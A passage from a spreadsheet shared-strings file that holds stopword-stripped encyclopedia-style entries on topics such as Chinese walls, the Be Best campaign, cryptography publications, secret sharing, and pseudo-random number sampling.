authentication guideline nist special publication 800-63-2" (pdf). nist publications describe standards identity credentials authentication systems"</t>
  </si>
  <si>
    <t>Chinese wall</t>
  </si>
  <si>
    <t>chinese wall ethical wall information barrier protocol within organization designed prevent exchange information communication could lead conflicts interest. example, chinese wall established separate people make investments privy confidential information could improperly influence investment decisions. firms generally required safeguard insider information ensure improper trading occur. etymology bryan garner's dictionary modern legal usage states metaphor title "derives course great wall china", although alternative explanation links idea screen walls chinese internal architecture.the term popularized united states following stock market crash 1929, u.s. government legislated information separation investment bankers brokerage firms, order limit conflict interest objective company analysis desire successful initial public offerings. rather prohibiting company engaging businesses, government permitted implementation chinese-wall procedures. leading note subject published 1980 university pennsylvania review titled "the chinese wall defense law-firm disqualification" perpetuated term. objections term chinese wall there disputes term decades, particularly legal banking sectors. term seen culturally insensitive inappropriate reflection chinese culture trade, extensively integrated global market.in peat, marwick, mitchell superior court (1988), presiding justice harry low, chinese american, wrote concurring opinion specifically order express profound objection phrase context". called term "piece legal flotsam emphatically abandoned", suggested "ethics wall" suitable alternative. maintained "continued term would insensitive ethnic identity many persons chinese descent". alternative terms alternative phrases include "screen", "firewall", "cone silence", "ethical wall". "screen", verb screen", preferred term american association model rules professional conduct. model rules define screening "the isolation lawyer participation matter timely imposition procedures within firm reasonably adequate circumstances protect information isolated lawyer obligated protect rules law", suitable "screening procedures" approved paralegals moved firm another worked cases former employer conflict interests current employer clients represent. usage specific industries finance chinese wall commonly employed investment banks, corporate-advisory area brokering department. this separates giving corporate advice takeovers advising clients buying shares researching equities themselves. "wall" thrown prevent leaks corporate inside information, could influence advice given clients making investments, allow staff take advantage facts known general public.the phrase "already wall" used equity research personnel refer rank-and-file personnel operate without ethics wall times. examples include members chinese wall department, compliance personnel, attorneys certain nyse-licensed analysts. term "over wall" used employee normally privy wall-guarded information somehow obtains sensitive information. breaches considered semi-accidental typically punitive action heyday "dot-com" era. these instances involving conflicts interest rampant era. major scandal exposed discovered research analysts encouraged blatantly publish dishonest positive analyses companies they, related parties, owned shares, companies depended investment banking departments research firms. u.s. government since passed laws strengthening ethics walls title sarbanes–oxley order prevent conflicts interest. ethics walls also used corporate finance departments "big four" large accountancy financial services firms. they designed insulate sensitive documentation wider firm order prevent conflicts. journalism term used journalism describe separation editorial advertising arms. chinese wall regarded breached "advertorial" projects. insurance term used property casualty insurance describe separation claim handling parties claim (e.g. airport airline) insurance policies insurer. claim handling process needs segregated within organisation avoid conflict interest. this also occurs unidentified uninsured motorist involved auto collision. case, loss adjusters take claim representing insured party another representing uninsured unidentified motorist. while represent policy, must investigate negotiate determine fault anything covered policy. case, chinese wall erected adjusters. chinese walls used firms address conflict interest, example separate part firm representing party deal litigation another part firm contrary interests confidential information adverse party. under law, firm represent competing parties suit, strictly defined situations individual earners sides. united states firms, chinese walls longer permitted except within narrow exceptions. american association model rules professional conduct (2004) state: "while lawyers associated firm, none shall knowingly represent client practicing alone would prohibited rules 1.9, unless prohibition based personal interest prohibited lawyer present significant risk materially limiting representation client remaining lawyers firm." although rules advisory, u.s. states adopted even stricter regulations place. government procurement chinese ethical walls required company already contract public body intends contract, circumstances public body concerned wishes maintain fair competitive procedure avoid minimise advantage existing contractor potential bidders. cases public sector terms contract require establishment "ethical wall arrangements" approved customer pre-condition involvement procurement process additional goods services successor contract. (19: broken link) computer science computer science, concept chinese wall used operating system computer security judicial system protection copyright infringement. computer security concerns software stability operating system. concept involved important business matter concerning licensing computer's many software hardware components. hardware component requires direct software interaction license license software "driver" running operating system. reverse engineering software part computer science involve writing driver piece hardware order enable work operating system unsupported manufacturer hardware, functionality increase performance operations (not provided manufacturer) supported operating system, restore usage piece computer hardware driver disappeared altogether. reverse engineered driver offers access development, persons outside company manufactured general hardware usage. reverse engineering there case-law mechanism called "clean room design" employed avoid copyright infringement reverse engineering proprietary driver. involves separate engineering groups separated chinese wall. group works hardware reverse engineer must original algorithms documents findings. group writes code, based documentation. once code begins function tests hardware, able refined developed time. this method insulates code code, reverse engineering less likely considered jury derived work. computer security basic model used provide privacy integrity data "chinese wall model" "brewer nash model". security model read/write access files governed membership data conflict-of-interest classes datasets. also brewer nash model conflict interest insider trading glass–steagall global settlement men: "chinese wall" references</t>
  </si>
  <si>
    <t>Certified Penetration Testing Engineer</t>
  </si>
  <si>
    <t>displaystyl, number, algorithm, time, comput, gener, code, secur, state, problem</t>
  </si>
  <si>
    <t>Be Best</t>
  </si>
  <si>
    <t>best public-awareness campaign promoted melania trump, former first lady united states, focusing well-being youth advocating cyberbullying. campaign melania trump made initiative came name best". trump said prepared criticism. formally introduced campaign 2018. following speech white house rose garden, president donald trump signed proclamation declaring best" day. unlike policy initiatives previous first ladies (such michelle obama's let's move! campaign childhood obesity, nancy reagan's just drugs campaign), best broad scope. initiative focuses physical emotional well-being, also advocates cyberbullying opioid abuse.the initiative began slow start, trump underwent kidney surgery week campaign launched. made public appearances next several weeks. july 2018, visited monroe carell children's hospital vanderbilt nashville, tennessee talked children neonatal withdrawal. august 2018, tweeted: "it's #backtoschool many youth month. begin year, best you? #bebest". spoke cyberbullying summit outside washington, d.c. august 2018.during initiative's first year, also promoted best in-person events oklahoma, washington state, nevada. also promoted best abroad trips ghana, malawi, kenya, egypt. criticism campaign accompanied booklet promoted written first lady melania trump." accusations plagiarism accrued, office responded admonishing press reporting issue. following plagiarism accusations white house's website changed copy read federal trade commission booklet, promoted first lady melania trump". fact-checking site snopes found charge plagiarism "mostly false", saying: "melania trump claim written pamphlet herself, contributed introduction slightly revised version booklet. always credited creation booklet supported inclusion first lady's best" campaign."the slogan best" also criticized apparent grammatical error, missing definite article, read best." guardian noted mrs. trump's native language, slovenian, definite articles, speculated whether name constituted one-upmanship michelle obama's call better". mrs. trump's senior adviser, stephanie winston wolkoff, called slogan "illiterate" pushed alternative slogan, "children first", first lady rejected similarities husband's "america first" branding.on december 2019, melania trump's best' hashtag trended twitter president sent critical tweet directed 16-year-old climate activist greta thunberg. several media outlets noted melania trump criticized legal expert pamela karlan previous week karlan mentioned trumps' teenage son, barron, testimony part ongoing impeachment inquiry. references external links best". whitehouse.gov national archives.</t>
  </si>
  <si>
    <t>List of important publications in cryptography</t>
  </si>
  <si>
    <t>this list important publications cryptography, organized field. some reasons particular publication might regarded important: topic creator publication created topic breakthrough publication changed scientific knowledge significantly influence publication significantly influenced world massive impact teaching cryptography. cryptanalysis index coincidence applications cryptology friedman, william (1922). "the index coincidence applications cryptology". department ciphers. publ geneva, illinois, usa: riverbank laboratories.description: presented index coincidence method codebreaking; number riverbank publications series. treatise enigma turing, alan (1939–1942). treatise enigma.description: breaking enigma. codebreakers: story secret writing kahn, david (1967). codebreakers: story secret writing. york: macmillan company. isbn 978-0-684-83130-5.oclc 59019141description: almost nothing published cryptography several decades non-government researchers thinking codebreakers, popular academic book, made many people aware contains technical information, although requires careful reading extract 1967 appearance followed appearance many papers next years. differential cryptanalysis des-like cryptosystems biham, eli; shamir, (1991). "differential cryptanalysis des-like cryptosystems". journal cryptology. (1): 3–72. doi:10.1007/bf00630563. s2cid 206783462.description: method differential cryptanalysis. method known plaintext attack feal cipher matsui, mitsuru; yamagishi, atsuhiro (1993). method known plaintext attack feal cipher". advances cryptology eurocrypt '92. lecture notes computer science. vol. 658. 81–91. doi:10.1007/3-540-47555-9_7. isbn 978-3-540-56413-3.description: method linear cryptanalysis. theory communication theory secrecy systems shannon, c.e. (1949). "communication theory secrecy systems" (pdf). bell system technical journal. (28–4): 656–715. doi:10.1002/j.1538-7305.1949.tb00928.x. hdl:10338.dmlcz/119717.description: information theory based analysis cryptography. original form paper confidential bell labs report 1945, published. probabilistic encryption goldwasser, shafi; micali, silvio (april 1984). "probabilistic encryption" (pdf). journal computer system sciences. (2): 270–299. doi:10.1016/0022-0000(84)90070-9.description: paper provides rigorous basis encryption (e.g., partial information) shows possible equate slightest cryptanalysis solve pure math problem. second, introduces notion computational indistinguishability. proofs yield nothing validity languages zero-knowledge proofs goldreich, micali, wigderson, (july 1991). "proofs yield nothing validity languages zero-knowledge proof systems" (pdf). journal acm. (3): 690–728. citeseerx 10.1.1.420.1478. doi:10.1145/116825.116852. s2cid 2389804.description: this paper explains construct zero-knowledge proof system language private cryptography cryptographic coding data-bank privacy feistel, horst march 1970). "cryptographic coding data-bank privacy". research report 2827.description: feistel ciphers form cipher important. would hard overestimate importance either feistel des. feistel pushed transition stream ciphers block ciphers. although ciphers operate streams, important ciphers today block ciphers core. data encryption standard federal standard fips 1977.description: widely deployed ciphers world profound impact development cryptography. roughly generation cryptographers devoted much time attacking improving des. public cryptography directions cryptography diffie, hellman, (1976). "new directions cryptography" (pdf). ieee transactions information theory. (6): 644–654. citeseerx 10.1.1.37.9720. doi:10.1109/tit.1976.1055638.description: this paper suggested public cryptography presented diffie–hellman exchange. information work see: w.diffie, m.e.hellman, "privacy authentication: introduction cryptography", proc. ieee, 67(3) 1979, 397–427. signature reblocking problem public cryptography kohnfelder, loren (1978). signature reblocking problem public cryptography". communications acm. (2): 179.description: paper (along loren kohnfelder,"using certificates distribution public-key cryptosystem", technical report 1978), kohnfelder introduced certificates (signed messages containing public keys) heart modern management systems. secure communications over insecure channels merkle, (april 1978). "secure communications over insecure channels". communications acm. (4): 294–299. citeseerx 10.1.1.364.5157. doi:10.1145/359460.359473. s2cid 6967714.description: this paper introduced branch public cryptography, known public distribution systems. merkle's work predated "new directions cryptography" though published diffie–hellman exchange implementation merkle system. hellman argued correct name would diffie–hellman–merkle exchange. method obtaining digital signatures public cryptosystems rivest, shamir, adleman, (1978). method obtaining digital signatures public-key cryptosystems". communications acm. (2): 120–126. citeseerx 10.1.1.607.2677. doi:10.1145/359340.359342. s2cid 2873616. archived original 2003-12-04.description: encryption method. first public-key encryption method. share secret shamir, (november 1979). "how share secret". communications acm. (11): 612–613. doi:10.1145/359168.359176. s2cid 16321225. archived original 2015-05-04.description: safe method sharing secret. security public protocols dolev, yao, (1983). security public protocols". ieee transactions information theory. (2): 198–208. doi:10.1109/tit.1983.1056650. issn 0018-9448. s2cid 13643880.description: introduced adversarial model almost cryptographic protocols judged. protocols using encryption authentication large networks computers needham, schroeder, (1978). "using encryption authentication large networks computers" (pdf). communications acm. (12): 993–999. citeseerx 10.1.1.357.4298. doi:10.1145/359657.359659. s2cid 7704786.description: this paper introduced basic ideas cryptographic protocols showed secret-key public-key encryption could used achieve authentication. kerberos neuman, b.c.; ts'o, (1994). "kerberos: authentication service computer networks". ieee communications magazine. (9): 33–38. doi:10.1109/35.312841. issn 0163-6804. s2cid 45031265. steiner, neuman, schiller, (february 1988). "kerberos: authentication service open network systems". usenix conference proceedings. dallas, texas.description: kerberos authentication protocol, allows individuals communicating insecure network prove identity another secure practical manner. protocol packet network interconnection cerf, vint; kahn, (1974). protocol packet network interconnection" (pdf). ieee transactions communication technology. (5): 637–648. doi:10.1109/tcom.1974.1092259. dynamic network architecture o'malley, sean peterson, larry (may 1992). dynamic network architecture". transactions computer systems. (2): 110–143. citeseerx 10.1.1.38.6159. doi:10.1145/128899.128901. s2cid 17134910.description: network software distributed systems. also books cryptography references codebreakers https://users.cs.jmu.edu/abzugcx/public/cryptology/journal-articles-on-crypto-posted.pdf</t>
  </si>
  <si>
    <t>Lexicographic code</t>
  </si>
  <si>
    <t>lexicographic codes lexicodes greedily generated error-correcting codes remarkably good properties. they produced independently vladimir levenshtein john horton conway neil sloane. binary lexicographic codes linear codes, include hamming codes binary golay codes. construction lexicode length minimum distance finite field generated starting all-zero vector iteratively adding next vector lexicographic order) minimum hamming distance vectors added far. example, length-3 lexicode minimum distance would consist vectors marked following example: here table n-bit lexicode d-bit minimal hamming distance, resulting maximum codewords dictionnary. example, code (n=4,d=2,m=3), extended hamming code (n=8,d=4,m=4) especially golay code (n=24,d=8,m=12) shows exceptional compactness compared neighbors. d-bit lexicode distances exact copies even distances minus last dimension, odd-dimensional space never create something interesting even-dimensional space above. since lexicodes linear, also constructed means basis. implementation following generate lexicographic code parameters golay code (n=24, d=8). combinatorial game theory theory lexicographic codes closely connected combinatorial game theory. particular, codewords binary lexicographic code distance encode winning positions variant grundy's game, played collection heaps stones, move consists replacing heap smaller heaps, goal take last stone. notes external links jenkins table binary lexicodes on-line generator lexicodes variants oeis sequence a075928 (list codewords binary lexicode hamming distance written decimal numbers.) error-correcting codes graphs: lexicodes, trellises factor graphs</t>
  </si>
  <si>
    <t>Piling-up lemma</t>
  </si>
  <si>
    <t>cryptanalysis, piling-up lemma principle used linear cryptanalysis construct linear approximations action block ciphers. introduced mitsuru matsui (1993) analytical tool linear cryptanalysis. lemma states bias (deviation expected value 1/2) linear boolean function (xor-clause) independent binary random variables related product input biases: {\displaystyle \epsilon (x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n})=2^{n-1}\prod _{i=1}^{n}\epsilon (x_{i})} {\displaystyle i(x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n})=\prod _{i=1}^{n}i(x_{i})} {\displaystyle \epsilon [-{\tfrac {1}{2}},{\tfrac {1}{2}}]} bias (towards zero) {\displaystyle i\in [-1,1]} imbalance: {\displaystyle \epsilon (x)=p(x=0)-{\frac {1}{2}}} {\displaystyle i(x)=p(x=0)-p(x=1)=2\epsilon (x)} .conversely, lemma hold, input variables independent. interpretation lemma implies xor-ing independent binary variables always reduces bias least increase it); moreover, output unbiased least unbiased input variable. note variables quantity {\displaystyle i(x\oplus correlation measure {\displaystyle {\displaystyle equal {\displaystyle p(x=y)-p(x\neq {\displaystyle i(x)} interpreted correlation {\displaystyle {\displaystyle expected value formulation piling-up lemma expressed naturally random variables take values {\displaystyle \{-1,1\}} introduce variables {\displaystyle \chi _{i}=1-2x_{i}=(-1)^{x_{i}}} (mapping then, inspection, xor-operation transforms product: {\displaystyle \chi _{1}\chi _{2}\cdots \chi _{n}=1-2(x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n})=(-1)^{x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n}}} since expected values imbalances, {\displaystyle e(\chi _{i})=i(x_{i})} lemma states: {\displaystyle e\left(\prod _{i=1}^{n}\chi _{i}\right)=\prod _{i=1}^{n}e(\chi _{i})} known property expected value independent variables. dependent variables formulation gains (positive negative) covariance term, thus lemma hold. fact, since bernoulli variables independent uncorrelated (i.e. zero covariance; uncorrelatedness), converse piling lemma: hold, variables independent (uncorrelated). boolean derivation piling-up lemma allows cryptanalyst determine probability equality: {\displaystyle x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n}=0} holds, binary variables (that bits: either p(a) denote "the probability true". equals one, certain happen, equals zero, cannot happen. first all, consider piling-up lemma binary variables, {\displaystyle p(x_{1}=0)=p_{1}} {\displaystyle p(x_{2}=0)=p_{2}} now, consider: {\displaystyle p(x_{1}\oplus x_{2}=0)} properties operation, equivalent {\displaystyle p(x_{1}=x_{2})} mutually exclusive events, {\displaystyle p(x_{1}=x_{2})=p(x_{1}=x_{2}=0)+p(x_{1}=x_{2}=1)=p(x_{1}=0,x_{2}=0)+p(x_{1}=1,x_{2}=1)} now, must make central assumption piling-up lemma: binary variables dealing independent; state effect state others. thus expand probability function follows: express probabilities probability biases amount probability deviates thus probability bias ε1,2 2ε1ε2. this formula extended follows: {\displaystyle p(x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n}=0)=1/2+2^{n-1}\prod _{i=1}^{n}\epsilon _{i}} note zero; binary variables unbiased, entire probability function unbiased equal related slightly different definition bias {\displaystyle \epsilon _{i}=p(x_{i}=1)-p(x_{i}=0),} fact minus times previous value. advantage {\displaystyle \varepsilon _{total}=p(x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n}=1)-p(x_{1}\oplus x_{2}\oplus \cdots \oplus x_{n}=0)} {\displaystyle \varepsilon _{total}=(-1)^{n+1}\prod _{i=1}^{n}\varepsilon _{i},} adding random variables amounts multiplying (2nd definition) biases. practice practice, approximations s-boxes (substitution components) block ciphers. typically, values inputs s-box values corresponding outputs. simply looking s-boxes, cryptanalyst tell probability biases are. trick find combinations input output values probabilities zero one. closer approximation zero one, helpful approximation linear cryptanalysis. however, practice, binary variables independent, assumed derivation piling-up lemma. this consideration kept mind applying lemma; automatic cryptanalysis formula. also variance independent real variables references</t>
  </si>
  <si>
    <t>Publicly Verifiable Secret Sharing</t>
  </si>
  <si>
    <t>cryptography, secret sharing scheme publicly verifiable (pvss) verifiable secret sharing scheme party (not participants protocol) verify validity shares distributed dealer. verifiable secret sharing (vss) object resist malicious players, dealer sending incorrect shares participants, (ii) participants submitting incorrect shares reconstruction protocol,cf. [cgma85]. publicly verifiable secret sharing (pvss), introduced stadler [sta96], explicit goal participants verify shares, anybody verify participants received correct shares. hence, explicitly required verified publicly. method introduced according paper chunming tang, dingyi pei, zhuo liu, yong non-interactive maintains property throughout protocol. initialization pvss scheme dictates initialization process which: system parameters generated. each participant must registered public key.excluding initialization process, pvss consists phases: distribution distribution secret {\displaystyle shares performed dealer {\displaystyle following: dealer creates {\displaystyle s_{1},s_{2}...s_{n}} participant {\displaystyle p_{1},p_{2}...p_{n}} respectively. dealer publishes encrypted share {\displaystyle e_{i}(s_{i})} {\displaystyle p_{i}} dealer also publishes string {\displaystyle \mathrm {proof} _{d}} show {\displaystyle e_{i}} encrypts {\displaystyle s_{i}} (note: {\displaystyle \mathrm {proof} _{d}} guarantees reconstruction protocol result {\displaystyle verification shares: anybody knowing public keys encryption methods {\displaystyle e_{i}} verify shares. verifications fails dealer fails protocol aborted. reconstruction decryption shares: participants {\displaystyle p_{i}} decrypts share secret {\displaystyle s_{i}} using {\displaystyle e_{i}(s_{i})} .(note: fault-tolerance allowed here: required participants succeed decrypting {\displaystyle e_{i}(s_{i})} long qualified participants successful decrypt {\displaystyle s_{i}} participant release {\displaystyle s_{i}} plus string {\displaystyle \mathrm {proof} _{p_{i}}} shows released share correct.2. pooling shares: using strings {\displaystyle \mathrm {proof} _{p_{i}}} exclude participants dishonest failed decrypt {\displaystyle e_{i}(s_{i})} reconstruction {\displaystyle done shares qualified participants. chaum-pedersen protocol proposed protocol proving: {\displaystyle \log _{_{g1}}h_{1}=\log _{_{g2}}h_{2}} prover chooses random {\displaystyle r\in {\boldsymbol {\mathrm }}_{q^{*}}} verifier sends random challenge {\displaystyle c\in _{r}{\boldsymbol {\mathrm }}_{q}} prover responds {\displaystyle s=r-cx(\mathrm {mod} \,q)} verifier checks {\displaystyle \alpha _{1}=g_{1}^{s}h_{1}^{c}} {\displaystyle \alpha _{2}=g_{2}^{s}h_{2}^{c}} denote protocol {\displaystyle \mathrm {dleq} (g_{1},h_{1},g_{2},h_{2})} generalization {\displaystyle \mathrm {dleq} (g_{1},h_{1},g_{2},h_{2})} denoted dleq {\displaystyle {\text{dleq}}(x,y,g_{1},h_{1},g_{2},h_{2})} {\displaystyle x=g_{1}^{x_{1}}g_{2}^{x_{2}}} {\displaystyle y=h_{1}^{x_{1}}h_{2}^{x_{2}}} prover chooses random {\displaystyle r_{1},r_{2}\in z_{q}^{*}} sends {\displaystyle t_{1}=g_{1}^{r_{1}}g_{2}^{r_{2}}} {\displaystyle t_{2}=h_{1}^{r_{1}}h_{2}^{r_{2}}} verifier sends random challenge {\displaystyle c\in _{r}{\boldsymbol {\mathrm }}_{q}} prover responds {\displaystyle s_{1}=r_{1}-cx_{1}(\mathrm {mod} \,q)} {\displaystyle s_{2}=r_{2}-cx_{2}(\mathrm {mod} \,q)} verifier checks {\displaystyle t_{1}=x^{c}g_{1}^{s_{1}}g_{2}^{s_{2}}} {\displaystyle t_{2}=y^{c}h_{1}^{s_{1}}h_{2}^{s_{2}}} chaum-pedersen protocol interactive method needs modification used non-interactive way: replacing randomly chosen {\displaystyle 'secure hash' function {\displaystyle input value. also verifiable secret sharing references markus stadler, publicly verifiable secret sharing berry schoenmakers, simple publicly verifiable secret sharing scheme application electronic voting, advances cryptology—crypto, 1999, 148–164</t>
  </si>
  <si>
    <t>Quantum Secret Sharing</t>
  </si>
  <si>
    <t>quantum secret sharing (qss) quantum cryptographic scheme secure communication extends beyond simple quantum distribution. modifies classical secret sharing (css) scheme using quantum information no-cloning theorem attain ultimate security communications. method secret sharing consists sender wishes share secret number receiver parties secret fully revealed large enough portion receivers work together. however, enough receivers work together reveal secret, secret remains completely unknown. classical scheme independently proposed shamir george blakley 1979. 1998, mark hillery, vladimír bužek, andré berthiaume extended theory make quantum states establishing secure could used transmit secret classical data. years following, work done extend theory transmitting quantum information secret, rather using quantum states establishing cryptographic key.qss proposed used quantum money well joint checking accounts, quantum networking, distributed quantum computing, among applications. protocol simplest case: states this example follows original scheme laid hillery 1998 makes greenberger–horne–zeilinger (ghz) states. similar scheme developed shortly thereafter used two-particle entangled states instead three-particle states. cases, protocol essentially extension quantum distribution receivers instead one. following typical language, sender denoted alice receivers charlie. alice's objective send receiver "share" secret (really quantum state) that: neither bob's charlie's share contains information alice's original message, therefore neither extract secret own. secret extracted charlie work together, case secret fully revealed. presence either outside eavesdropper dishonest receiver (either charlie) detected without secret revealed.alice initiates protocol sharing charlie particle triplet (standard) z-basis, holding onto third particle herself: {\displaystyle |\mathrm {\psi \rangle _{\rm {ghz}}={\frac {|000\rangle +|111\rangle }{\sqrt {2}}},} {\displaystyle |\mathrm \rangle {\displaystyle |\mathrm \rangle orthogonal modes arbitrary hilbert space. after participant measures particle y-basis (chosen random), share (via classical, public channel) basis used make measurement, result itself. upon combining measurement results, charlie deduce alice measured time. repeating process many times, using small fraction verify malicious actors present, three participants establish joint communicating securely. consider following clear example work. define eigenstates following, standard way: {\displaystyle |\mathrm {+x} \rangle ={\frac {|0\rangle +|1\rangle }{\sqrt {2}}},|\mathrm {-x} \rangle ={\frac {|0\rangle -|1\rangle }{\sqrt {2}}}} {\displaystyle |\mathrm {+y} \rangle ={\frac {|0\rangle +i|1\rangle }{\sqrt {2}}},|\mathrm {-y} \rangle ={\frac {|0\rangle -i|1\rangle }{\sqrt {2}}}} .the state rewritten {\displaystyle |\mathrm {\psi \rangle _{\rm {ghz}}={\frac {1}{2{\sqrt {2}}}}[({|+x\rangle _{a}|+x\rangle _{b}+|-x\rangle _{a}|-x\rangle _{b}})(|0\rangle _{c}+|1\rangle _{c})+({|+x\rangle _{a}|-x\rangle _{b}+|+x\rangle _{a}|-x\rangle _{b}})(|0\rangle _{c}-|1\rangle _{c})]} ,where denote particles (alice, bob, charlie) alice's bob's states written x-basis. using form, evident exists correlation alice's bob's measurements charlie's single-particle state: alice correlated results charlie state {\displaystyle {\frac {|0\rangle _{c}+|1\rangle _{c}}{\sqrt {2}}}} alice anticorrelated results charlie state {\displaystyle {\frac {|0\rangle _{c}-|1\rangle _{c}}{\sqrt {2}}}} clear table summarizing correlations knowing measurement bases alice bob, charlie measurement result deduce whether alice opposite results. note however make deduction, charlie must choose correct measurement basis measuring particle. since chooses noncommuting bases random, half time able extract useful information. half time results must discarded. additionally, table charlie determining measured what, results alice correlated anticorrelated. thus charlie figure alice's measurement working together sharing results. extract alice's results every measurement information create cryptographic know. ((k,n)) threshold scheme simple case described extended similarly done shamir blakley thresholding scheme. ((k,n)) threshold scheme (double parentheses denoting quantum scheme), alice splits secret (quantum state) shares shares required extract full information less shares cannot extract information alice's key. number users needed extract secret bounded consider ((k,n)) threshold scheme applied disjoint sets independent copies alice's secret reconstructed. this course would violate no-cloning theorem must less long ((k,n)) threshold scheme exists, ((k,n-1)) threshold scheme constructed simply discarding share. this method repeated k=n. following outlines simple ((2,3)) threshold scheme, complicated schemes imagined increasing number shares alice splits original state into: consider alice beginning single qutrit state {\displaystyle |\mathrm {\psi \rangle _{a}=\alpha |0\rangle +\beta |1\rangle +\gamma |2\rangle mapping three qutrits {\displaystyle |\mathrm {\psi \rangle =\alpha (|000\rangle +|111\rangle +|222\rangle )+\beta (|012\rangle +|120\rangle +|201\rangle )+\gamma (|021\rangle +|102\rangle +|210\rangle sharing qutrit receivers. evident single share give information alice's original state, since share maximally mixed state. however, shares could used reconstruct alice's original state. assume first shares given. first share second (modulo three) value second share first. resulting state {\displaystyle |\mathrm {\psi \rangle =(\alpha |0\rangle +\beta |1\rangle +\gamma |2\rangle )(|00\rangle +|12\rangle +|21\rangle first qutrit exactly alice's original state. method, sender's original state reconstructed receivers' particles, crucial measurements made reconstruction process superposition within quantum state collapse. security security relies upon no-cloning theorem protect possible eavesdroppers well dishonest users. this section adopts two-particle entanglement protocol briefly mentioned above. eavesdropping promises security eavesdropping exact quantum distribution. consider eavesdropper, eve, assumed capable perfectly discriminating creating quantum states used protocol. eve's objective intercept receivers' (say bob's) shares, measure recreate state send whomever share initially intended for. issue method needs randomly choose basis measure half time choose wrong basis. when chooses correct basis, correct measurement result certainty recreate state measured send without presence detected. however, chooses wrong basis, sending states incorrect basis. measure state sent half time correct detection, state wrong basis equal superposition states correct basis. thus, half time measures wrong basis therefore sends incorrect state, measure wrong state. this intervention eve's part leads causing error protocol extra trials. therefore, enough measurements, nearly impossible miss protocol errors occurring probability instead probability predicted theory, thus signaling eavesdropper within communication channel. more complex eavesdropping strategies performed using ancilla states, eavesdropper still detectable similar manner. dishonest participant now, consider case participants protocol (say bob) acting malicious user trying obtain secret without participants aware. analyzing possibilities, learns choosing proper order charlie release measurement bases results testing eavesdropping promise detection cheating occurring. proper order turns receiver releases measurement results. receiver releases measurement results. receiver releases measurement basis. receiver releases measurement basis.this ordering prevents receiver knowing basis share tricking participants receiver know basis receiver going announce used. similarly, since receiver must release results first, cannot control measurements correlated anticorrelated valid combination bases used. way, acting dishonestly introduce errors eavesdropper testing phase whether dishonest participant receiver receiver thus, ordering releasing data must carefully chosen prevent dishonest user acquiring secret without noticed participants. experimental realization this section follows first experimental demonstration 2001 made possible advances techniques quantum optics.the original idea using states challenging implement difficulties producing three-particle correlations either down-conversion processes {\displaystyle \chi ^{3}} nonlinearities three-photon positronium annihilation, rare events. instead, original experiment performed two-particle scheme using standard {\displaystyle \chi ^{2}} spontaneous parametric down-conversion (spdc) process third correlated photon pump photon. experimental setup works follows: alice: pulsed laser emitted time {\displaystyle t_{0}} enters interferometer unequal path lengths pump split distinct temporal pulses equal amplitude. interferometer contains phase shifter control phase difference arms, denoted {\displaystyle \alpha pump pulses focused onto nonlinear crystal pump photons down-converted photon pairs spdc. spdc pairs split, sent charlie. charlie: both receivers identical interferometers used alice exact time difference arms achieved phase shifter denoted {\displaystyle \beta {\displaystyle \gamma charlie. different possible trajectories interferometer lead three distinct time differences alice's pump pulse emitted bob's charlie's spdc photons detected {\displaystyle t_{b}} {\displaystyle t_{c}} respectively), well three time differences detections bob's charlie's detectors.using {\displaystyle |\mathrm \rangle _{i},|\mathrm \rangle _{j}} either short path long path 'a', 'b', label participant's interferometer, notation describes arbitrary path taken combination participants. notice {\displaystyle |\mathrm \rangle _{a},|\mathrm \rangle _{j}} {\displaystyle |\mathrm \rangle _{a},|\mathrm \rangle _{j}} either indistinguishable processes time difference processes exactly same. true {\displaystyle |\mathrm \rangle _{b},|\mathrm \rangle _{c}} {\displaystyle |\mathrm \rangle _{b},|\mathrm \rangle _{c}.} describing indistinguishable processes mathematically, {\displaystyle |\mathrm {\psi \rangle ={\frac {1}{\sqrt {2}}}(|l\rangle _{a},|s\rangle _{b}|s\rangle _{c}+e^{i(\alpha +\beta +\gamma )}|s\rangle _{a},|l\rangle _{b}|l\rangle _{c})),} thought "pseudo-ghz state" difference true state three photons exist simultaneously. nonetheless, triple "coincidences" described exactly probability function true state, {\displaystyle p_{i,j,k}={\frac {1}{8}}(1+ijk\cos(\alpha +\beta +\gamma )),} implying work 2-particle source. setting phases {\displaystyle \alpha ,\beta {\displaystyle \gamma either {\displaystyle {\frac {\pi }{2}}} much two-photon bell tests, shown setup violates bell-type inequality three particles, {\displaystyle s_{3}=|e(\alpha '+\beta +\gamma )+e(\alpha +\beta '+\gamma )+e(\alpha +\beta +\gamma ')-e(\alpha '+\beta '+\gamma ')|\leq {2}} ,where {\displaystyle e(\alpha +\beta +\gamma expectation value coincidence measurement phase shifter settings {\displaystyle (\alpha ,\beta ,\gamma experiment, bell-type inequality violated, 3.69 {\displaystyle s_{\rm {exp}}=3.69} suggesting setup exhibits quantum nonlocality. this seminal experiment showed quantum correlations setup indeed described probability function {\displaystyle p_{i,j,k}.} simplicity spdc source allowed coincidences much higher rates traditional three-photon entanglement sources, making practical. this first experiment prove feasibility protocol. references</t>
  </si>
  <si>
    <t>List of hash functions</t>
  </si>
  <si>
    <t>this list hash functions, including cyclic redundancy checks, checksum functions, cryptographic hash functions. cyclic redundancy checks adler-32 often mistaken crc, not, checksum. checksums universal hash function families non-cryptographic hash functions keyed cryptographic hash functions unkeyed cryptographic hash functions also hash function security summary secure hash algorithms nist hash function competition derivation functions (category) references</t>
  </si>
  <si>
    <t>Pseudo-random number sampling</t>
  </si>
  <si>
    <t>pseudo-random number sampling non-uniform pseudo-random variate generation numerical practice generating pseudo-random numbers distributed according given probability distribution. methods sampling non-uniform distribution typically based availability pseudo-random number generator producing numbers uniformly distributed. computational algorithms used manipulate single random variate, often several variates, random variate values required distribution. historically, basic methods pseudo-random number sampling developed monte-carlo simulations manhattan project; first published john neumann early 1950s. finite discrete distributions discrete probability distribution finite number indices probability mass function takes non-zero values, basic sampling algorithm straightforward. interval divided intervals f(1)), [f(1), f(1) f(2)), width interval equals probability f(i). draws uniformly distributed pseudo-random number searches index corresponding interval. determined distribution f(i). formalizing idea becomes easier using cumulative distribution function {\displaystyle f(i)=\sum _{j=1}^{i}f(j).} convenient f(0) intervals simply [f(0), f(1)), [f(1), f(2)), ..., [f(n f(n)). main computational task determine f(i). this done different algorithms: linear search, computational time linear binary search, computational time goes indexed search, also called cutpoint method. alias method, computational time constant, using pre-computed tables. there methods cost constant time. continuous distributions generic methods generating independent samples: rejection sampling 